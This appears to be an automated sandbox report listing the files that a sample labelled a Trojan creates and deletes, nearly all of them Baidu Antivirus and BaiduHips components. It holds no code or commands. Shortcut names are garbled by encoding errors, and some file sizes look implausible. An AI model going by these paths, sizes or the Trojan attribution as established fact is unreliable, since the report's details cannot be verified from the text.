%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMRepMgr.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOCleanerPreScan.dat (1 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDKV.rdb (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BaiduAnBugRpt.exe (23936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\{F5E93978-539C-476B-9A7B-B6C32025A557}.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASoftmgr.exe (25824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysAccLiveStrategy.dat (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAnUpdate.exe (34365 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\GCCallbackBind.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOSilentCleanerConfig.dat (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMBase.dll (32128 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\BDDefense.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\systemfile.dat (6 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\drivers\BDMNetMon.sys (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\vatl.msi (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SORegCleanerConfig.dat (900 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHipsBugRpt.exe (3361 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_3_speed.png (15 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\Softmgr.rdb (690 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SmartTips.rdb (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\policy_baiduan.xml (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHipsUpdate.exe (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\StartupDict.dat (19096 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\policy.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\8500.dat (18424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDMReport.dll (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDDefense_x64.sys (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOCleanerTrayPlugin.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\directui license.txt (593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMProcessRunningTime.dll (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\softmgr.ico (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDAFileHelper.exe (21216 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMAVEng.dll (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDLogicUtils.dll (10136 bytes)
%Documents and Settings%\All Users\Desktop\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«.lnk (895 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDNetMisc.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\softmgr_remind.ico (12024 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\InstallCfg.xml (177 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_5_speed.png (15 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_2_speed.png (15 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\placeholder_tmp (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMKVScanPlugin.dll (12088 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«.lnk (907 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bd0001.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOGarbageCleanerConfig.dat (12 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\hips_self_enc.xml (1 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDMUpdate.rdb (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDConfig.dll (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\libeay32.dll (33391 bytes)
%System%\drivers\bd0001.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\hipsClient.xml (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAnSvc.exe (33295 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\HipsClient.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\libcurllicense.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\uninst.exe (51840 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDKitUtils.dll (7384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bd0001.sys (11144 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\DriverManager.dll (8680 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\wverify.dat (15019 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\font_desc.f (873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOLiveAccStrategyMgr.dll (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHipsBusiness.dll (9320 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SOManager.rdb (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SORegCleanerScript.dat (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDSWShellExt.dll (15168 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\Mainpage.rdb (23936 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_1_speed.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHipsUpdate.exe (1552 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch.7z (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMMsg.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMStringUtils.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDAVCache.dll (34186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMNetMonMgrDll.dll (1856 bytes)
%System%\config (288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMRepBase.dll (30344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\TrustAndIso.dll (14416 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSWParseDetect.dll (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\GetSupplyId.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bd0002.sys (19752 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMWindowsLib.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\PluginSetup.xml (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\bdmantivirus\BDKitUtils.dll (601 bytes)
%System%\drivers\bd0002.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysOptDict.dat (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMLog.dll (1552 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_0_speed.png (15 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SusPlugin.rdb (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOCleanerConfig.dat (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\InstallHelper.dll (37368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_repairproperty.dat (2 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\dl.dll (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDMNet.dll (33295 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\preliminary.db (23296 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SYSCleaner.dll (32824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDSoftMgrModule.dll (1552 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«\ÃƒÂ¥Ã‚ÂÃ‚Â¸ÃƒÂ¨Ã‚Â½Ã‚Â½ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«.lnk (880 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\CommonRes.rdb (62035 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\duilib license.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSafePlugin.dll (21216 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\GameNoDisturb.ini (215 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\804.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOAccServicePlugin.dll (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDSWShellExt64.dll (20624 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMToolBox.dll (18424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixer.dll (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASWAcc.exe (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHipsIU.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixerXMLScript.dat (3 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\BDDefense.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMCommon.dll (10136 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMAVCached.dll (1425 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDMTray.rdb (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMAVEng.dll (50840 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_class_filter.db (26688 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\kav_compatible.dat (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMReport.dll (25672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_property.dat (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\GCScriptBind.dll (32824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMDbSqlite.dll (19592 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\cache_config.dat (469 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\EnhanceBoost.dll (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\ad.dll (38248 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\Patcher.rdb (2392 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\BDDefense_x64.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOAccTrayPlugin.dll (14184 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\BDArKit.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_extlist.dat (3 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMReport.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\color_desc.clr (213 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\policy.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduPrevUIn.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOHomePageCleanerConfig.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMPatcherPlugin.dll (39770 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\pluginUnit.dat (727 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDMTray\TrayPlugin.rdb (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SYSAccMgrDll.dll (21216 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASWHelper.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHipsCore.dll (30344 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SafePlugin.rdb (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixerPreOptimizeXMLScript.dat (519 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHips.exe (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\ns19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSWNetComm.dll (12088 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_9_speed.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMScriptVM.dll (8184 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_8_speed.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\blacksign.dat (1389 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMFrameWork.dll (21480 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSusPlugin.dll (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\ccesign.dat (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMTrayTipsPlugin.dll (23424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMMainFrame.dll (34773 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOPluginCleanerConfig.dat (441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\install_res.rdb (40702 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMConnect.dll (28288 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_4_speed.png (15 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SysAccelerator.rdb (6584 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\bd0002.sys (673 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\bd0001.sys (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\bd0001.sys (673 bytes)
%System%\config\system (6543 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\openssllicense.txt (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bddownloader.exe (41699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSWManagerView.dll (37727 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMAccount.dll (14184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bduf.dll (15168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSkin.dll (33263 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_minute_speed.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOLiveAccDataMgr.dll (11048 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\KVMain.rdb (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\placeholder_tmp (11 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMTinyXml.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduPrevUIn.dll (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysRepLib.dat (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAnSWPlugin.exe (784 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMFrameWork.dll (1425 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\bd0002.sys (673 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\TrustAndIso.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\app.ico (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMTinyXml.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDMFrameWork.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\cache_config.dat (469 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\hips_product.xml (291 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOCleanerPlugin.dll (88648 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOCleanerCheckItem.dat (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMNet.dll (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDALeakfixer.exe (27704 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SysFixer.rdb (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMUpdate.dll (14840 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\drivers\BDMWrench.sys (7192 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\BaiduAnCache.rptc (1068 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\NetService.ini (1205 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDPerflog.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SWCatalogDataItem.xml (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMDownload.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\HotPlugins.xml (386 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMLog.dll (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMCloudEng.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSmartTip.dll (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\PluginConfig.db (62035 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixerPreOptimizeConfig.dat (497 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDMSetting.rdb (2392 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDLogicUtils.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\skin_engine.dll (13584 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\systemfile.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\dl.dll (65930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMUserCenter.dll (9320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDDriverFixer.dll (16368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\WebSafe.dll (33455 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHipsBugRpt.exe (19152 bytes)

The Trojan deletes the following file(s):

%Program Files%\baidu\BaiduAn\3.0.0.3971\baiduan_number_new.ttf (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\System.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\BDArKit.sys (0 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Download\dl.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\bd0001.sys (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDLogicUtils.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.6.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\BDArKit.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\nsExec.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMPatchAgent.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\bd0002.sys (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64 (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch.7z (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMAVCached.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0002.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDMFrameWork.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\text_cn.str (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\TrustAndIso.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\BDDefense.sys (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\bd0001.sys (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMAVEng.dll (0 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\vcrt.msi (0 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\vatl.msi (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\NetService.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\GetSystemVer.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMMsg.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMStringUtils.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.7.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BaiduAnBugRpt.exe (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.7.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\bd0002.sys (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\smr.dat (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.3.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.8.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.1.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMDownload.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMBase.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86 (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMNet.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMTinyXml.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDMReport.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\install_res.rdb (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDLogicUtils.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\systemfile.dat (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDDriverFixer.dll (0 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â« (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_product.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\font_desc.f (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.6.dll (0 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Download\7z.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.8.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\GetSupplyId.dll (0 bytes)
